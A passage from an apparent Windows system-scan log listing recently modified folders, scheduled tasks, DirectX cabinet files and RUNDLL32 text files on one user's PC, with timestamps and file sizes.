G\AppData\Roaming\vlc 2015-09-19 18:33 - 2013-10-03 21:25 - 00000000 ____D C:\Users\Kenny G\AppData\Roaming\Skype 2015-09-19 16:38 - 2015-05-12 22:45 - 00000000 ____D C:\Program Files\Microsoft Silverlight 2015-09-19 16:38 - 2015-05-12 22:45 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight 2015-09-19 16:35 - 2015-05-12 22:46 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight 2015-09-19 16:07 - 2015-08-07 11:38 - 00003848 _____ C:\Windows\System32\Tasks\Opera scheduled Autoupdate 1438940281 2015-09-19 16:07 - 2015-08-07 11:37 - 00000000 ____D C:\Program Files (x86)\Opera 2015-09-19 16:06 - 2009-07-14 05:20 - 00000000 ____D C:\Program Files\Common Files\Microsoft Shared 2015-09-19 15:37 - 2015-06-02 08:55 - 00000000 ____D C:\ProgramData\AVG2015 2015-09-19 15:37 - 2013-10-01 21:25 - 00001442 _____ C:\Users\Kenny G\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk 2015-09-19 11:54 - 2014-11-11 21:45 - 00000000 ____D C:\Users\Kenny G\Desktop\schule 2015-09-19 11:17 - 2009-07-14 20:18 - 00000000 ____D C:\Windows\ShellNew 2015-09-16 20:19 - 2015-05-19 19:27 - 00004106 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA1d0925912f22c70 2015-09-16 20:19 - 2015-05-19 19:27 - 00003854 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore1d0925912504720 2015-09-12 12:16 - 2014-01-15 20:58 - 00282296 _____ C:\Windows\SysWOW64\PnkBstrB.xtr 2015-09-12 12:16 - 2014-01-15 20:58 - 00282296 _____ C:\Windows\SysWOW64\PnkBstrB.exe 2015-09-12 12:14 - 2014-01-15 20:58 - 00215128 _____ C:\Windows\SysWOW64\PnkBstrB.ex0 2015-09-12 12:14 - 2013-12-08 04:01 - 00000000 ____D C:\Program Files (x86)\Steam 2015-09-09 10:54 - 2014-02-17 11:46 - 00000000 ____D C:\Users\Tabea Studium 2015-09-09 10:54 - 2013-12-14 00:05 - 00000000 ____D C:\Users\eLoot 2015-09-03 13:45 - 2013-10-26 19:41 - 00305664 ___SH C:\Users\Kenny G\Documents\Thumbs.db 2015-09-03 13:43 - 2015-08-13 02:23 - 00000946 _____ C:\Windows\Tasks\Adobe Flash Player PPAPI Notifier.job 2015-09-03 13:43 - 2015-02-10 17:45 - 00001110 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d0454889312e80.job 2015-09-03 13:43 - 2015-02-10 17:45 - 00001106 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore1d04548885af2c0.job 2015-09-03 13:43 - 2014-11-14 16:21 - 00001110 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d00016545d4e90.job 2015-09-03 13:43 - 2014-02-16 13:52 - 00001110 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job 2015-09-03 13:43 - 2014-02-16 13:52 - 00001106 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job 2015-09-02 22:17 - 2015-06-01 12:10 - 00003206 _____ C:\Windows\System32\Tasks\{AFE2C666-2C4F-49BB-B86B-2CC7B241F441} 2015-09-02 22:17 - 2015-02-10 17:45 - 00004118 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA1d0454889312e80 2015-09-02 22:16 - 2015-08-13 02:23 - 00003948 _____ C:\Windows\System32\Tasks\Adobe Flash Player PPAPI Notifier 2015-09-02 22:16 - 2015-02-10 17:45 - 00003866 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore1d04548885af2c0 2015-09-02 22:16 - 2014-11-14 16:21 - 00004118 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA1d00016545d4e90 2015-09-02 22:16 - 2014-02-16 13:52 - 00004118 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA 2015-09-02 22:16 - 2014-02-16 13:52 - 00003866 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore 2015-09-02 22:16 - 2014-02-16 03:10 - 00003300 _____ C:\Windows\System32\Tasks\{7AD56248-245F-4D20-B2FB-3A38DD4D9679} 2015-09-02 22:16 - 2013-10-01 22:01 - 00002778 _____ C:\Windows\System32\Tasks\CCleanerSkipUAC 2015-09-01 22:34 - 2015-08-14 11:07 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Native Instruments 2015-09-01 22:33 - 2015-08-14 11:07 - 00000000 ____D C:\Program Files\Native Instruments 2015-09-01 22:24 - 2015-08-14 11:07 - 00000000 ____D C:\Program Files\Common Files\Native Instruments 2015-09-01 22:17 - 2015-08-08 00:13 - 00000000 ____D C:\Users\Kenny G\Documents\Native Instruments 2015-08-30 01:38 - 2013-12-04 21:27 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service 2015-08-29 20:01 - 2014-06-19 18:04 - 00000000 ____D C:\Users\Kenny G\.thumbnails 2015-08-29 20:01 - 2009-10-14 08:04 - 00000000 ____D C:\Windows\Panther 2015-08-29 15:58 - 2015-08-14 11:07 - 00000000 ____D C:\ProgramData\Native Instruments 2015-08-29 09:26 - 2015-06-02 08:56 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG 2015-08-29 03:35 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\system32\NDF 2015-08-26 18:37 - 2009-10-14 07:12 - 134753440 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe 2015-08-26 11:33 - 2015-06-02 09:01 - 00000000 ____D C:\Program Files (x86)\AVG Web TuneUp ==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse ======= 2010-06-02 06:21 - 2010-06-02 06:21 - 1347354 _____ () C:\Program Files (x86)\Apr2005_d3dx9_25_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 1078962 _____ () C:\Program Files (x86)\Apr2005_d3dx9_25_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 1397830 _____ () C:\Program Files (x86)\Apr2006_d3dx9_30_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 1115221 _____ () C:\Program Files (x86)\Apr2006_d3dx9_30_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0916430 _____ () C:\Program Files (x86)\Apr2006_MDX1_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 4162630 _____ () C:\Program Files (x86)\Apr2006_MDX1_x86_Archive.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0179133 _____ () C:\Program Files (x86)\Apr2006_XACT_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0133103 _____ () C:\Program Files (x86)\Apr2006_XACT_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0087101 _____ () C:\Program Files (x86)\Apr2006_xinput_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0046010 _____ () C:\Program Files (x86)\Apr2006_xinput_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0698612 _____ () C:\Program Files (x86)\APR2007_d3dx10_33_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0695865 _____ () C:\Program Files (x86)\APR2007_d3dx10_33_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 1607358 _____ () C:\Program Files (x86)\APR2007_d3dx9_33_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 1606039 _____ () C:\Program Files (x86)\APR2007_d3dx9_33_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0195766 _____ () C:\Program Files (x86)\APR2007_XACT_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0151225 _____ () C:\Program Files (x86)\APR2007_XACT_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0096817 _____ () C:\Program Files (x86)\APR2007_xinput_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0053302 _____ () C:\Program Files (x86)\APR2007_xinput_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 1350542 _____ () C:\Program Files (x86)\Aug2005_d3dx9_27_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 1077644 _____ () C:\Program Files (x86)\Aug2005_d3dx9_27_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0182903 _____ () C:\Program Files (x86)\AUG2006_XACT_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0137235 _____ () C:\Program Files (x86)\AUG2006_XACT_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0087142 _____ () C:\Program Files (x86)\AUG2006_xinput_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0046058 _____ () C:\Program Files (x86)\AUG2006_xinput_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0852286 _____ () C:\Program Files (x86)\AUG2007_d3dx10_35_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0796867 _____ () C:\Program Files (x86)\AUG2007_d3dx10_35_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 1800160 _____ () C:\Program Files (x86)\AUG2007_d3dx9_35_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 1708152 _____ () C:\Program Files (x86)\AUG2007_d3dx9_35_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0198096 _____ () C:\Program Files (x86)\AUG2007_XACT_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0153012 _____ () C:\Program Files (x86)\AUG2007_XACT_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0867612 _____ () C:\Program Files (x86)\Aug2008_d3dx10_39_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0849167 _____ () C:\Program Files (x86)\Aug2008_d3dx10_39_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 1794084 _____ () C:\Program Files (x86)\Aug2008_d3dx9_39_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 1464672 _____ () C:\Program Files (x86)\Aug2008_d3dx9_39_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0121772 _____ () C:\Program Files (x86)\Aug2008_XACT_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0092996 _____ () C:\Program Files (x86)\Aug2008_XACT_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0271412 _____ () C:\Program Files (x86)\Aug2008_XAudio_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0271038 _____ () C:\Program Files (x86)\Aug2008_XAudio_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0919044 _____ () C:\Program Files (x86)\Aug2009_D3DCompiler_42_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0900598 _____ () C:\Program Files (x86)\Aug2009_D3DCompiler_42_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 3112111 _____ () C:\Program Files (x86)\Aug2009_d3dcsx_42_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 3319740 _____ () C:\Program Files (x86)\Aug2009_d3dcsx_42_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0232635 _____ () C:\Program Files (x86)\Aug2009_d3dx10_42_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0192131 _____ () C:\Program Files (x86)\Aug2009_d3dx10_42_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0136301 _____ () C:\Program Files (x86)\Aug2009_d3dx11_42_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0105044 _____ () C:\Program Files (x86)\Aug2009_d3dx11_42_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0930116 _____ () C:\Program Files (x86)\Aug2009_d3dx9_42_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0728456 _____ () C:\Program Files (x86)\Aug2009_d3dx9_42_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0122408 _____ () C:\Program Files (x86)\Aug2009_XACT_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0093106 _____ () C:\Program Files (x86)\Aug2009_XACT_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0273264 _____ () C:\Program Files (x86)\Aug2009_XAudio_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0272642 _____ () C:\Program Files (x86)\Aug2009_XAudio_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1357976 _____ () C:\Program Files (x86)\Dec2005_d3dx9_28_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1079456 _____ () C:\Program Files (x86)\Dec2005_d3dx9_28_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0212807 _____ () C:\Program Files (x86)\DEC2006_d3dx10_00_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0191720 _____ () C:\Program Files (x86)\DEC2006_d3dx10_00_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1571154 _____ () C:\Program Files (x86)\DEC2006_d3dx9_32_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1574376 _____ () C:\Program Files (x86)\DEC2006_d3dx9_32_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0192475 _____ () C:\Program Files (x86)\DEC2006_XACT_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0145599 _____ () C:\Program Files (x86)\DEC2006_XACT_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0089944 _____ (Microsoft Corporation) C:\Program Files (x86)\DSETUP.dll 2010-06-02 06:22 - 2010-06-02 06:22 - 1801048 _____ () C:\Program Files (x86)\dsetup32.dll 2010-06-02 06:22 - 2010-06-02 06:22 - 0042410 _____ () C:\Program Files (x86)\dxdllreg_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0537432 _____ () C:\Program Files (x86)\DXSETUP.exe 2010-06-02 06:22 - 2010-06-02 06:22 - 0094011 _____ () C:\Program Files (x86)\dxupdate.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1247499 _____ () C:\Program Files (x86)\Feb2005_d3dx9_24_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1013225 _____ () C:\Program Files (x86)\Feb2005_d3dx9_24_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1362796 _____ () C:\Program Files (x86)\Feb2006_d3dx9_29_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1084720 _____ () C:\Program Files (x86)\Feb2006_d3dx9_29_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0178359 _____ () C:\Program Files (x86)\Feb2006_XACT_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0132409 _____ () C:\Program Files (x86)\Feb2006_XACT_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0194675 _____ () C:\Program Files (x86)\FEB2007_XACT_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0147983 _____ () C:\Program Files (x86)\FEB2007_XACT_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0054678 _____ () C:\Program Files (x86)\Feb2010_X3DAudio_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0020713 _____ () C:\Program Files (x86)\Feb2010_X3DAudio_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0122446 _____ () C:\Program Files (x86)\Feb2010_XACT_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0093180 _____ () C:\Program Files (x86)\Feb2010_XACT_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0276960 _____ () C:\Program Files (x86)\Feb2010_XAudio_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0277191 _____ () C:\Program Files (x86)\Feb2010_XAudio_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1336002 _____ () C:\Program Files (x86)\Jun2005_d3dx9_26_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1064925 _____ () C:\Program Files (x86)\Jun2005_d3dx9_26_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0180785 _____ () C:\Program Files (x86)\JUN2006_XACT_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0133671 _____ () C:\Program Files (x86)\JUN2006_XACT_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0699044 _____ () C:\Program Files (x86)\JUN2007_d3dx10_34_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0698472 _____ () C:\Program Files (x86)\JUN2007_d3dx10_34_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1607774 _____ () C:\Program Files (x86)\JUN2007_d3dx9_34_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1607286 _____ () C:\Program Files (x86)\JUN2007_d3dx9_34_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0197122 _____ () C:\Program Files (x86)\JUN2007_XACT_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0152909 _____ () C:\Program Files (x86)\JUN2007_XACT_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0867828 _____ () C:\Program Files (x86)\JUN2008_d3dx10_38_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0849919 _____ () C:\Program Files (x86)\JUN2008_d3dx10_38_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1792608 _____ () C:\Program Files (x86)\JUN2008_d3dx9_38_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1463878 _____ () C:\Program Files (x86)\JUN2008_d3dx9_38_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0055154 _____ () C:\Program Files (x86)\JUN2008_X3DAudio_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0021905 _____ () C:\Program Files (x86)\JUN2008_X3DAudio_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0121054 _____ () C:\Program Files (x86)\JUN2008_XACT_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0093128 _____ () C:\Program Files (x86)\JUN2008_XACT_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0269628 _____ () C:\Program Files (x86)\JUN2008_XAudio_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0269024 _____ () C:\Program Files (x86)\JUN2008_XAudio_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0944460 _____ () C:\Program Files (x86)\Jun2010_D3DCompiler_43_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0931471 _____ () C:\Program Files (x86)\Jun2010_D3DCompiler_43_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0752783 _____ () C:\Program Files (x86)\Jun2010_d3dcsx_43_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0762188 _____ () C:\Program Files (x86)\Jun2010_d3dcsx_43_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0235955 _____ () C:\Program Files (x86)\Jun2010_d3dx10_43_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0197283 _____ () C:\Program Files (x86)\Jun2010_d3dx10_43_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0138205 _____ () C:\Program Files (x86)\Jun2010_d3dx11_43_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0109445 _____ () C:\Program Files (x86)\Jun2010_d3dx11_43_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0937246 _____ () C:\Program Files (x86)\Jun2010_d3dx9_43_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0768036 _____ () C:\Program Files (x86)\Jun2010_d3dx9_43_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0124596 _____ () C:\Program Files (x86)\Jun2010_XACT_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0093686 _____ () C:\Program Files (x86)\Jun2010_XACT_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0277338 _____ () C:\Program Files (x86)\Jun2010_XAudio_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0278060 _____ () C:\Program Files (x86)\Jun2010_XAudio_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0844884 _____ () C:\Program Files (x86)\Mar2008_d3dx10_37_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0818260 _____ () C:\Program Files (x86)\Mar2008_d3dx10_37_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1769862 _____ () C:\Program Files (x86)\Mar2008_d3dx9_37_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1443282 _____ () C:\Program Files (x86)\Mar2008_d3dx9_37_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0055058 _____ () C:\Program Files (x86)\Mar2008_X3DAudio_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0021867 _____ () C:\Program Files (x86)\Mar2008_X3DAudio_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0122336 _____ () C:\Program Files (x86)\Mar2008_XACT_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0093734 _____ () C:\Program Files (x86)\Mar2008_XACT_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0251194 _____ () C:\Program Files (x86)\Mar2008_XAudio_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0226250 _____ () C:\Program Files (x86)\Mar2008_XAudio_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1067160 _____ () C:\Program Files (x86)\Mar2009_d3dx10_41_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1040745 _____ () C:\Program Files (x86)\Mar2009_d3dx10_41_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1973702 _____ () C:\Program Files (x86)\Mar2009_d3dx9_41_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1612446 _____ () C:\Program Files (x86)\Mar2009_d3dx9_41_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0054600 _____ () C:\Program Files (x86)\Mar2009_X3DAudio_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0021298 _____ () C:\Program Files (x86)\Mar2009_X3DAudio_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0121506 _____ () C:\Program Files (x86)\Mar2009_XACT_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0092740 _____ () C:\Program Files (x86)\Mar2009_XACT_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0275044 _____ () C:\Program Files (x86)\Mar2009_XAudio_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0273018 _____ () C:\Program Files (x86)\Mar2009_XAudio_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0864600 _____ () C:\Program Files (x86)\Nov2007_d3dx10_36_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0803884 _____ () C:\Program Files (x86)\Nov2007_d3dx10_36_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1802058 _____ () C:\Program Files (x86)\Nov2007_d3dx9_36_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1709360 _____ () C:\Program Files (x86)\Nov2007_d3dx9_36_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0046144 _____ () C:\Program Files (x86)\NOV2007_X3DAudio_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0018496 _____ () C:\Program Files (x86)\NOV2007_X3DAudio_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0196762 _____ () C:\Program Files (x86)\NOV2007_XACT_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0148264 _____ () C:\Program Files (x86)\NOV2007_XACT_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0994154 _____ () C:\Program Files (x86)\Nov2008_d3dx10_40_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0965421 _____ () C:\Program Files (x86)\Nov2008_d3dx10_40_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1906878 _____ () C:\Program Files (x86)\Nov2008_d3dx9_40_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1550796 _____ () C:\Program Files (x86)\Nov2008_d3dx9_40_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0054522 _____ () C:\Program Files (x86)\Nov2008_X3DAudio_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0021851 _____ () C:\Program Files (x86)\Nov2008_X3DAudio_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0121794 _____ () C:\Program Files (x86)\Nov2008_XACT_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0092684 _____ () C:\Program Files (x86)\Nov2008_XACT_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0273960 _____ () C:\Program Files (x86)\Nov2008_XAudio_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0272611 _____ () C:\Program Files (x86)\Nov2008_XAudio_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0086037 _____ () C:\Program Files (x86)\Oct2005_xinput_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0045359 _____ () C:\Program Files (x86)\Oct2005_xinput_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1412902 _____ () C:\Program Files (x86)\OCT2006_d3dx9_31_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1127217 _____ () C:\Program Files (x86)\OCT2006_d3dx9_31_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0182361 _____ () C:\Program Files (x86)\OCT2006_XACT_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0138017 _____ () C:\Program Files (x86)\OCT2006_XACT_x86.cab 2015-07-05 04:14 - 2015-07-05 04:14 - 0000911 _____ () C:\Users\Kenny G\AppData\Local\recently-used.xbel 2014-07-31 10:50 - 2014-07-31 10:51 - 0022400 _____ () C:\ProgramData\RUNDLL32.EXE-1180-F.txt 2014-07-06 17:23 - 2014-07-06 17:23 - 0244720 _____ () C:\ProgramData\RUNDLL32.EXE-12956-F.txt 2014-07-27 17:22 - 2014-07-28 13:07 - 0079618 _____ () C:\ProgramData\RUNDLL32.EXE-1384-F.txt 2014-07-10 10:53 - 2014-07-10 17:12 - 0298281 _____ () C:\ProgramData\RUNDLL32.EXE-1424-F.txt 2014-07-19 22:13 - 2014-07-20 00:37 - 0113345 _____ () C:\ProgramData\RUNDLL32.EXE-1436-F.txt 2014-07-30 09:52 - 2014-07-30 13:45 - 0181914 _____ () C:\ProgramData\RUNDLL32.EXE-1596-F.txt 2014-07-21 20:18 - 2014-07-21 22:11 - 0087977 _____ () C:\ProgramData\RUNDLL32.EXE-1788-F.txt 2014-07-18 05:35 - 2014-07-18 11:01 - 0242621 _____ () C:\ProgramData\RUNDLL32.EXE-2188-F.txt 2014-07-31 18:04 - 2014-07-31 18:05 - 0001416 _____ () C:\ProgramData\RUNDLL32.EXE-2284-F.txt 2014-07-31 10:34 - 2014-07-31 10:45 - 0008414 _____ () C:\ProgramData\RUNDLL32.EXE-2308-F.txt 2014-07-18 22:37 - 2014-07-19 01:07 - 0118602 _____ () C:\ProgramData\RUNDLL32.EXE-2348-F.txt 2014-07-28 15:20 - 2014-07-28 15:52 - 0025184 _____ () C:\ProgramData\RUNDLL32.EXE-2444-F.txt 2014-07-29 22:22 - 2014-07-29 23:10 - 0038461 _____ () C:\ProgramData\RUNDLL32.EXE-2460-F.txt 2014-07-12 11:11 - 2014-07-12 12:12 - 0048083 _____ () C:\ProgramData\RUNDLL32.EXE-2480-F.txt 2014-07-10 19:57 - 2014-07-10 20:25 - 0007207 _____ () C:\ProgramData\RUNDLL32.EXE-2584-F.txt 2014-07-29 10:41 - 2014-07-29 12:12 - 0071934 _____ () C:\ProgramData\RUNDLL32.EXE-2904-F.txt 2014-07-16 20:21 - 2014-07-17 22:12 - 0478880 _____ () C:\ProgramData\RUNDLL32.EXE-3004-F.txt 2014-07-20 08:08 - 2014-07-20 11:56 - 0181099 _____ () C:\ProgramData\RUNDLL32.EXE-3044-F.txt 2014-08-01 06:26 - 2014-08-01 13:03 - 0282818 _____ () C:\ProgramData\RUNDLL32.EXE-3108-F.txt 2014-07-10 22:41 - 2014-07-10 23:23 - 0033087 _____ () C:\ProgramData\RUNDLL32.EXE-3160-F.txt 2014-07-12 04:26 - 2014-07-12 05:10 - 0035209 _____ () C:\ProgramData\RUNDLL32.EXE-3164-F.txt 2014-07-28 18:24 - 2014-07-28 19:58 - 0074219 _____ () C:\ProgramData\RUNDLL32.EXE-3264-F.txt 2014-08-07 06:42 - 2014-08-07 09:07 - 0076563 _____ () C:\ProgramData\RUNDLL32.EXE-3272-F.txt 2014-08-12 17:39 - 2014-08-12 17:48 - 0005807 _____ () C:\ProgramData\RUNDLL32.EXE-3288-F.txt 2014-08-12 18:47 - 2014-08-12 21:55 - 0104772 _____ () C:\ProgramData\RUNDLL32.EXE-3308-F.txt 2014-08-15 13:01 - 2014-08-15 13:53 - 0017691 _____ () C:\ProgramData\RUNDLL32.EXE-3356-F.txt 2014-08-14 16:21 - 2014-08-14 18:56 - 0059067 _____ () C:\ProgramData\RUNDLL32.EXE-3396-F.txt 2014-08-16 03:06 - 2014-08-16 04:02 - 0018161 _____ () C:\ProgramData\RUNDLL32.EXE-3452-F.txt 2014-08-03 08:19 - 2014-08-03 14:26 - 0294846 _____ () C:\ProgramData\RUNDLL32.EXE-3468-F.txt 2014-08-01 13:28 - 2014-08-03 00:37 - 0583063 _____ () C:\ProgramData\RUNDLL32.EXE-3480-F.txt 2014-08-07 10:20 - 2014-08-08 02:21 - 0085411 _____ () 